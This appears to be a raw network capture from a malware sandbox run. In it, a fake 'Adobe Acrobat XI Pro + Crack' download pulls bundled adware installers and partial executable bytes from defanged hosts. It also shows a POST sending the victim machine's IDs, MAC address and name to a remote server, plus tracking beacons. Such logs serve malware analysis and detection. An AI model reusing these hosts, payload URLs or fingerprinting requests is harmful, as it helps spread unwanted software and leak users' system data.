s=first..u=hXXp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + CrackHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Content-Length: 165..Connection: keep-alive..Date: Sun, 27 Nov 2016 15:38:03 GMT..Server: Apache/2.2.15 (CentOS)..X-Powered-By: PHP/5.3.3..X-Cache: Miss from cloudfront..Via: 1.1 1d32f672764a20290d04a16248d04c57.cloudfront.net (CloudFront)..X-Amz-Cf-Id: pwOrHWNvHEzqRYu6kTcPvSZ6KfYulsUHBz183NeW7ON1TJMeH6lwVw==..s=first..u=hXXp://off.ncongruousric.bid/stub_maker.php?program=sevenzip&tid=10958132&pid=2735&b_typ=pe&reb=1&name=Adobe Acrobat XI Pro 11.0.18 Multilingual + Crack..

GET /9JyMZd3Sr1SWmlHcollYw9UchZnROZ1RwIVNMNVdyUXUahzNJBTSSJmbtQnSws0ZzxWUop3RNZmawknQfNGbppmcNRURkZmV59lRRdnNx9kaNZkcHVkWOV0NI5kMDhjM3k2cjx0T1tmSBpWbL9mWtYDOuxmI6IiMkl2XiV3ciwiI2QzMiojIkl2XiV3ciwiI4IzN1QTMzIiOiUmepNnIsICc1RXZzJiOiUGc5RnIsISTggTMuAjLxEDIvJHUgkEWgQXYi9mcjFEIlJ2bkFkI6ISZtFmbiwiI5kTO50zMyFmdm0jMyFmdm0TMyFmdmITP0R3PthnYD9FbwlWRQZHTFdjZnNVLWFXQ58CX0VmbuIzYvhGZh5yajlGbjF2Lc9CX6AHd0hmI6ICbyVnIsISM1IDOiojIkl2ciwiIxIiOiIXZ2Jye HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0

Host: elja.linggyp.ru

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.4.2

Date: Sun, 27 Nov 2016 15:37:49 GMT

Content-Type: application/exe; charset=windows-1251

Content-Length: 3951944

Connection: keep-alive

X-Powered-By: PHP/5.4.17

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Sun, 27 Nov 2016 15:37:49 GMT

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Content-Disposition: attachment; filename="Adobe Acrobat XI Pro 11.0.exe"

Content-Transfer-Encoding: binary

Pragma: public

MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................@'...................@..........................p=.......<..........@...........................P#.81... %.IN...........(<.H%....#..m............................#.....................................................CODE....(........................... ..`DATA....lL.......N..................@...BSS..........P"......6"..................idata..81...P#..2...6".............@....tls....0.....#......h"..................rdata........#......h".............@..P.reloc...m....#..n...j".............@..P.rsrc...IN... %..P....#.............@..P.....................F-.............@..P..................................................................................................................................................................@...Boolean...........@..False.True.@.,.@...WideChar..........D.@...Char..........X.@...Smallint..........p.@...Integer.............@...Byte............@...Word............@...Cardinal............@...Int64...................@...Double..@...@...Currency....@...ShortString.....@...WordBool...........@..False.True..@.@...LongBool.........<.@..False.True..h.@...Stringt.@...WideString..@...Variant.@...@...OleVariant..@...............................@..........C@..C@..C@..C@..C@..@@..A@.TA@..TObject..@

<<< skipped >>>

GET /stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=Adobe Acrobat XI Pro 11.0.18 M HTTP/1.0

Host: wet.sodcattilyrem.bid

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: application/force-download

Content-Length: 60676

Connection: close

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.3.28

Content-Disposition: attachment; filename="583afdedde2bb_ua.exe"

X-Powered-By: ASP.NET

Date: Sun, 27 Nov 2016 15:38:21 GMT

X-Cache: Miss from cloudfront

Via: 1.1 1280e48937eca7de58e32cd35415f48a.cloudfront.net (CloudFront)

X-Amz-Cf-Id: oQ7y_HWecgaCXkCxikw8vq21OYN4z3k2ejmMGV3mJIa-ra6vjGhk6w==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@..........................`............@.................................4........@..........................d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2....P......................@..B........................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....-G..H.P.u..u..u.....@..K...SV.5.-G.W.E.P.u.....@..e...E..E.P.u.....@..}..e....D.@........FR..VV..U... M..........M........E...FQ.....NU..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u.....@..u....E..9}...n....~X.te.v4..L.@..E...tU.}.j.W.E......E.......P.@..vXW..T.@..u..5X.@.W..h ....E..E.Pj.h..F.W....@..u.W...u....E.P.u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ

<<< skipped >>>

POST /index.php HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

Accept-Language: en-US

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0E; .NET4.0C)

Host: VVV.secularistsarakolet.site

Content-Length: 523

Connection: Keep-Alive

Cache-Control: no-cache

Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.5.50709&OSversion=NT6.1SP1&Slv=&Sysid=541B298A93BFE2600111218F9ABFCC32&Sysid1=52D311BE788EE1E500992B8A6A042C2B&X64=N&admin=Y&browser=IE.HTTP&cavp=&chver=54.0.2840.59&cmdl=Setup__2140_il2.exe&dprod=D068E036AD104FFF0E13053E615F8D&dprod4=C275E3FEDEC17C9D31A2BE03568B64&exe=Setup__2140_il2&ffver=49.0.1.6109&lang_DfltUser=0409&mac=MDA1MDU2MzNCNTUxMDAwMAA=&machg=ODhkY2QzOTUtYjA2Mi00NWIzLWE2Y2QtNzlmMzdjMGViYTA4AA==&name=V0lOLVVLMEZGT084M0k2AA==&netfs=3&ts=1480261117&ver=1.1.5.26

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Date: Sun, 27 Nov 2016 15:38:39 GMT

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

transfer-encoding: chunked

Connection: keep-alive

4d9....<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> . <title>DownloadManagerModern</title>...<script type="text/javascript">... var g_notCompatibleWithUpdaterComps = ['LootFindKP'];... var g_postponedComps = ['updater', 'Paltalk', 'SHAREit', 'JinshanDuba', 'UCwebAccelerator', 'UltimateSecurityPackage' , 'TotalSecurity', 'TotalSecurityIN', 'TotalSecurityRU'];...</script> . <base href="hXXp://VVV.secularistsarakolet.site:80/index.php" />.<link rel="stylesheet" type="text/css" href="hXXp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css" /> <script type="text/javascript" src="hXXp://cdn1.leadingdownload.com/V38/amipb.js"></script>. <script type="text/javascript">.var g_r_appimageurl="http:\/\/pe-sixi.com\/img\/icon_installer.png";..var g_r_appname="installer";..var g_r_cmdline="\/S";.. var g_amiobj = '', g_ami, g_updb = false, g_close = '1', g_additional_offer_list = '1';. var g_finish_install_button = '1';. var g_popup_install_all = '1';. var g_eula = 'VGhlIGRvd25sb2FkIGFuZCBpbnN0YWxsYXRpb24gcHJvY2VzcyBvZiB0aGlzIGZ..32e8..pbGUgaXMgcnVuIGJ5IEluc3RhbGxQYXRoIEluc3RhbGwgTWFuYWdlci4KQnkgY2xpY2tpbmcgdGhlICJBY2NlcHQiIG9yICJOZXh0IiBidXR0b25zIGJlbG93LCBvciBieSBjb250aW51aW5nIHRoaXMgSW5zdGFsbFBhdGggSW5zdGFsbCBNYW5hZ2VyIGluc3RhbGxhdGlvbiw

<<< skipped >>>

GET /crls/secureca.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Thu, 13 Oct 2016 09:30:22 GMT

If-None-Match: "b6a46da3cf1aa70c10b101b12c9733f4:1476351022"

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.geotrust.com

HTTP/1.1 200 OK

Server: Apache

ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"

Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT

Date: Sun, 27 Nov 2016 15:38:44 GMT

Content-Length: 325

Connection: keep-alive

Content-Type: application/pkix-crl

0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q.......N.\..........\......cvl.........^3.~..!.HTTP/1.1 200 OK..Server: Apache..ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"..Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT..Date: Sun, 27 Nov 2016 15:38:44 GMT..Content-Length: 325..Connection: keep-alive..Content-Type: application/pkix-crl..0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q.......N.\..........\......cvl.........^3.~..!...

GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0

Host: VVV.dosecuretrips.com

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Access-Control-Allow-Origin: *

Access-Control-Expose-Headers: X-Target-FN

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Content-Disposition: attachment; filename="Setup__2140_il2.exe"

Content-Type: application/x-msdownload

Date: Sun, 27 Nov 2016 15:38:33 GMT

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Last-Modified: Sun, 27 Nov 2016 15:38:33 GMT

Pragma: no-cache

Server: Apache/2.2.15 (Red Hat)

X-Powered-By: PHP/5.3.3

X-Target-FN: Setup__2140_il2.exe

Content-Length: 716288

Connection: Close

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.u.....R..4....R.......R..4..Q.R.......R..4....R...R...R.......R.......R...S...R..4....R..4....R..4....R.Rich..R.........................PE..L.....3X.................`...................p....@..........................@............@.............................................8E......................DZ.. u..................................@............p..\............................text...._.......`.................. ..`.rdata..T....p.......d..............@..@.data....[...0...4..................@....rsrc...8E.......F...J..............@..@.reloc..4].......^..................@..B......................................................................................................................................................................................................................................................................................................... ..........3.9.....V........D$.....^...j .UNF..#...3.9.tRj.h|.F..M..E......]..].......]..}...E.s..E.SSS.6Ph..F......YY...6...tF.Sj..M.......I....3..H..H....3...uH..|uH..xuH..tuH...uH..tuH..3.9..HH.t..=.HH....HH.s...HH..j...SF.......}.j.....F.X3.3..G.._.f.O..]..G83.._4f.G$.u..w@.E........Gp....._l3.f.G\........F............................................................................................_x._|................V........D$..t.V.c=..Y..^...j...SF......j...vH.X3.3..}....vH...F...vH....vH.f...vH.

<<< skipped >>>

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCG8Char7jo+T HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com

HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 24 Nov 2016 19:25:21 GMT

Expires: Mon, 28 Nov 2016 19:25:21 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 245603

Cache-Control: public, max-age=345600

0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o...........20161123130113Z....20161130130113Z0...*.H...................[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,........\...jk....).......:....."....HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 19:25:21 GMT..Expires: Mon, 28 Nov 2016 19:25:21 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 245603..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130113Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..o...........20161123130113Z....20161130130113Z0...*.H...................[...^..=...L....b....qG.1 ]M=F=....P.En/K'.<....}..5..Z,..'0....:".S..d....M...!H.....l]..@ g...V../.%..o......a.Z;....xjW7.S..6...E...|.......QXl.....u.....b....t.q#._..9zl.E...7..f.z.D..U.......2i.J....P!.;`.'.,........\...jk....).......:....."........

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com

HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 24 Nov 2016 19:31:39 GMT

Expires: Mon, 28 Nov 2016 19:31:39 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 245227

Cache-Control: public, max-age=345600

0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v..HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 19:31:39 GMT..Expires: Mon, 28 Nov 2016 19:31:39 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 245227..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v....

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCHNzUKtRZktz HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com

HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Thu, 24 Nov 2016 20:12:58 GMT

Expires: Mon, 28 Nov 2016 20:12:58 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 242749

Cache-Control: public, max-age=345600

0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v..HTTP/1.1 200 OK..Content-Type: application/ocsp-response..Date: Thu, 24 Nov 2016 20:12:58 GMT..Expires: Mon, 28 Nov 2016 20:12:58 GMT..Server: ocsp_responder..Content-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Age: 242749..Cache-Control: public, max-age=345600..0..........0..... .....0......0...0......J......h.v....b..Z./..20161123130507Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./..ssP.QfKs....20161123130507Z....20161130130507Z0...*.H..................{u/....)i..i..((..oX..)..1....>e..s....{'t......&...$.J.....M..y.....z..C'HQ....G7...l...JR..i.....'N.qB<.v.~4iYP....f|.;2...Y5..4x.[.v(..d-....... Xi.O.{..Z.O$3,.Z.. '.x....-M.....%.........\).8%.J{.........|..<63@...B....e.....~.......T^..TO..l(.v....

GET /movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0 HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tour.cinemaden.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Encoding: gzip

Content-Type: text/html; charset=UTF-8

Date: Sun, 27 Nov 2016 15:38:41 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

Content-Length: 36844

Connection: keep-alive

.............r.G.%...".s.......%.Dr.$!..$....h......P.B..>..w.9.....9.="#....z.l.l.v[`UVF.......g.?..-o.G...j.....?..d.X<...v...j&......t._.........].....r0_....V...o.D...ry.3......._wV......`9>......t9..w.....b.~../'........M.W..[...l>.^.g....a..O....l.,.........O........O...`..8.LF....M....|4y....K.V.f..o5..............h6}x6......t..K... ..._.my;.-.G#.._u.X<\.......'.E....i~.k^...fg....7...[.......|.............?X<.=.x0.0xpu....x....b2...&......./....?=..7...O..?........._..6....=../...........r{0.X]a?.....}9y.....n....h..w.......................h._/^.....a..........`q;={...-.g./........w...x..../G...h.......mPv8.y.&....3b.{p.........dg.h.Ml..............`............O.....?y.....V.....|t1.......l7...-Q...o.{<(.>|.....]n...W....nGsq..!.=...._?.....w.'....h.._.......t.O...........}.......Gz.gx8.^..c.y<|...>>.||.X.-A[..._........~.....~..o.=.....}.O.<z....O..y...W....;....w;.;}|.3...7;O.........t...tt1x..^...t....w.[..y.56'?....{...={h....Q....s.H.g.M"=;..o..?.....9.o...>.N..t>...../.8.[/~...pP.Z.0.`.<[,......j9...1.}..Ow1..`1j............[1....EK....W<{8x.,g...z>.4..F.^.....l....5W.G0...O<.&C......_...f6o0.d|..:.&..\..$.N...?....WW...d >.....2@/0..3.[.\.t./:...|..G3......../......`.G....;........O..U.cr}:.N....MG8I.i....S5.s...S.%.)s:^.<..D.\..Q..... ._hnd;..x..v..2...:3...w......gA......yh.P........%.;."....Z._;....jZnY...l....hN'......_'.s. I.f.|.&h.lT..a.............I|}...7.{-A...xa........%,.GgP.i...<;.w7...2..........z.qCU.3....B-.E.0'........

<<< skipped >>>

GET /js/main.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://tour.cinemaden.com/movie_player/twin?ref=167172&s2stoken=qNZFZAnrJXsdd1yj83z3FwfE3m0&landing_page_id=33&clk=1&tc=167172_64_557_33_138_8038&click_id=20161127-27f60d0a-0394-4b1f-a628-2ca0cae693d9&ega=0

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: tour.cinemaden.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Encoding: gzip

Content-Type: application/javascript

Date: Sun, 27 Nov 2016 15:38:45 GMT

ETag: W/"582622c6-368b"

Last-Modified: Fri, 11 Nov 2016 19:57:58 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

Content-Length: 4244

Connection: keep-alive

...........[[s...~..h...H.HJ%..#{....bE.%.a..;.4.&.3....D...)...n...f...,.[............?@....).!....\z....*...>....>.\.l.j..$....c.x....x....5...........f.]s-....g.\a..8[bW.c.)x.g.k..[x.19ds....=...&..,..R..1n..7...M.....X,^..W.oU..K.?Q....B.`.P.\.?Y}......juk.g...U...S...w......||...O?G...........b..w.Z:X.*......@5}Y..n../......Z..ll.....0.X..O.w..5.r.,...O.....E0.y........Gu|..?..[.j5Z.xl1...M/.R.<M...H....MN. H4...P.Ly.Z.zy.g....GY.T.V`X......7=...... .f.E...[.>[zZz8.l.o......O<nw.R....L.x..AA.....5.C.i.N.....gZ..[m.S.q./g..\C.B,.6.X..........237F'..).Z.`.0...pX0c..}.6_.|CA.....g..u..........l..a-.q..g..k.#....l....fXfC.. ...f.\.;`.aZe&.`$.B..(....h....D..."~....`......J(.,.....J.gf.FF.bR5..Nj=.75......4.>.6.L..\.s...".,.:y... g..tK..s......c..k.$.......:...w...*`=W....Ht....&.LT..(... 5.9....&...Di..mnQ...6.D.R(U.uz..f.%...A...P..yT.um...`.cj=S..x. ..W...1..^b0...n2....R5Z.............&3........._._._.|...Q..g.I.....&.j.|.^T.;.P.^QT.F..<...o..1.V.2..!^..,.yp...;...dr...~.r....Y.:.}.....hh.....O\H.(.0'.aZC..&....Y.am...l.m........S&.....k........H.........4...`....7.-..&7....k.....z.O.fh.f...$~!..8.s.......Cc...z..kk..SxI.:..l.V-.F...9.P....e<..;..;.}4......a........a.......O...=...a.........{...]..i;.....>V.....c`....-.....7_.Z<...sr.$. .@.a.Wx.I...>UT`....{wB.n..#1.OcRr..c@}.....V.o....../k...X......{_.{.3d.4.\A... a.D......-.......P..d.;.w.;_......Z.BnD.q....P....g$Lq.....e........0.<;..LU.}.Z|...K,e..*,...#..#..........?.*........h.j...V.\R.....%.,6..b........m.. T...k

<<< skipped >>>

GET /img/favicon/cinemaden.com/favicon.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: tour.cinemaden.com

Connection: Keep-Alive

Cookie: _ga=GA1.2.1439064958.1480261126; _gat=1

HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: image/x-icon

Date: Sun, 27 Nov 2016 15:38:47 GMT

ETag: "57325088-1536"

Last-Modified: Tue, 10 May 2016 21:20:08 GMT

Server: nginx

Strict-Transport-Security: max-age=31536000; includeSubDomains

Content-Length: 5430

Connection: keep-alive

............ .h...&... .... .........(....... ..... .....@..................................................................................................................!...............................................................................q...............................#...[...........5...i...........9...............................5...%...........a.......................................%...A...m...o.......'...............}...........................!...o.......................................c...................................................................................G...........................................#.......................#...?.......S.......5...................!...................................e...............................................................q...................................................'.......#.......{.......................%...............................................{..........._...!...................................k...!...........1...)....................................................................................................................................................(... ...@..... ............................................................................................................................................#...................................................1.......................................................................................................................................................Q..........

<<< skipped >>>

GET /crls/secureca.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Thu, 13 Oct 2016 09:30:22 GMT

If-None-Match: "b6a46da3cf1aa70c10b101b12c9733f4:1476351022"

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.geotrust.com

HTTP/1.1 200 OK

Server: Apache

ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"

Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT

Date: Sun, 27 Nov 2016 15:38:44 GMT

Content-Length: 325

Connection: keep-alive

Content-Type: application/pkix-crl

0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q.......N.\..........\......cvl.........^3.~..!.HTTP/1.1 200 OK..Server: Apache..ETag: "3db9af6d4daf4b2025d118aba973ba63:1480260638"..Last-Modified: Sun, 27 Nov 2016 15:30:38 GMT..Date: Sun, 27 Nov 2016 15:38:44 GMT..Content-Length: 325..Connection: keep-alive..Content-Type: application/pkix-crl..0..A0..0...*.H........0N1.0...U....US1.0...U....Equifax1-0 ..U...$Equifax Secure Certificate Authority..161127152300Z..161207152300Z0,0....%...020514181157Z0.....3..020515130611Z0...*.H............44...... ..4-g..7"..q.J..0vPc..O..X..kD.3.Y.Rc.........:..p......i..u.]...!....:Q.......N.\..........\......cvl.........^3.~..!...

GET /stats.php?bu=cp&c=&step= HTTP/1.0

Host: get.gunnightmar.club

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Connection: close

Date: Sun, 27 Nov 2016 15:38:23 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 62fcc6919801a5602c53d055b177c4f9.cloudfront.net (CloudFront)

X-Amz-Cf-Id: v0nTILH8B7lO0atK9IGzAtS5FRJUiahDpMIx_3u_xZEqL90Dvtp00w==

GET /stats.php?bu=rx&c=&step=1 HTTP/1.0

Host: get.gunnightmar.club

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Connection: close

Date: Sun, 27 Nov 2016 15:38:32 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 d79148f01e44f5598c15bdd5ce1c1997.cloudfront.net (CloudFront)

X-Amz-Cf-Id: qKy6xKjkeNG7i9e4v7zZ6rDXDkkh0I6BRjbfGxCgBigmeRoNylQypw==

GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6kg== HTTP/1.1

Cache-Control: max-age = 564348

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Wed, 12 Oct 2016 22:33:53 GMT

User-Agent: Microsoft-CryptoAPI/6.1

Host: g.symcd.com

HTTP/1.1 200 OK

Server: nginx/1.10.1

Content-Type: application/ocsp-response

Content-Length: 1362

content-transfer-encoding: binary

Cache-Control: max-age=563527, public, no-transform, must-revalidate

Last-Modified: Sun, 27 Nov 2016 04:06:13 GMT

Expires: Sun, 4 Dec 2016 04:06:13 GMT

Date: Sun, 27 Nov 2016 15:38:44 GMT

Connection: keep-alive

0..N......G0..C.. .....0.....40..00.......j.#.p.e$.\ps.*.. .j..20161127040613Z0f0d0<0... ..........9.....yP..`...<.......*.A.....>U....... ...:.....20161127040613Z....20161204040613Z0...*.H.............n%... l8.(,.Q`.j...:..6.xSGt*.....[.....(.S.V....gS.7.....R..}.Sl....{..._..m.@..^.).>.....(..../.ze.F.f:..m.<@...Z.A.H.....&1Z .'......~.X..:.[:/...n..SO I.8M.#w.0.D..$P.....,.......G[....~q..C.....Kp.~.`SQ.N....`.~&.sP.D.........9..t...:5...'....u.l.........0...0..|0..d........:.0...*.H........0B1.0...U....US1.0...U....GeoTrust Inc.1.0...U....GeoTrust Global CA0...151203170230Z..161214170230Z02100...U...'GeoTrust Global CA TGV OCSP Responder 40.."0...*.H.............0.........[.c.#zj......RME.....,......(..U......!-.l..R..E.~..%."./8mv..D...*...Rx........mw.~2..Q5T\.H...Wk*..a.z.$._..T......;T.S.r(._*.G....^.P.!.3..t.......s......P....C._.g.b.oK...EV..>...>.|.o.~quo.............v4..Tt....Q.]A.Y......... w.E..=.%.n7.......{" *C........0..0...U.#..0....z.h.....d..}.}e...N0... .....0......0...U.%..0... .......0...U...........0...U.......0.0 ..U....0...0.1.0...U....TGV-C-670...*.H...............aEc<..'R......]C.ri.Zm.....|..B.$..76..h....l...Xbxua...C.X.S....~K..A..._.T@$.....9(.... ......\.*.....5.b.x...[QM.._9P.=..l...gf..L.?..3 ......Z....._...20R;...x.......C..0....l.G.A..5TS>d.U......w.(\....v..9.z7.....J..;..'...u.Y...BB.@.2u.e..eW..J.U....

<<< skipped >>>

GET /report.php?typ=conversion&transId=139867460&affId=1006&instId=11&ho_transId=1024c893cfbfff9cc18408df1cefd7&s1=2735&s2=10958132&s3=&s4=&s5=1352224761&cid=5c12d1104cca24294ae7d8d45ce8d028&uac=true&randid=0.45457626983710575 HTTP/1.1

Cache-Control: no-cache

Connection: Keep-Alive

Pragma: no-cache

User-Agent: InstallCapital

Host: ee.wintervenepest.bid

HTTP/1.1 200 OK

Content-Type: text/html

Server: Microsoft-IIS/8.5

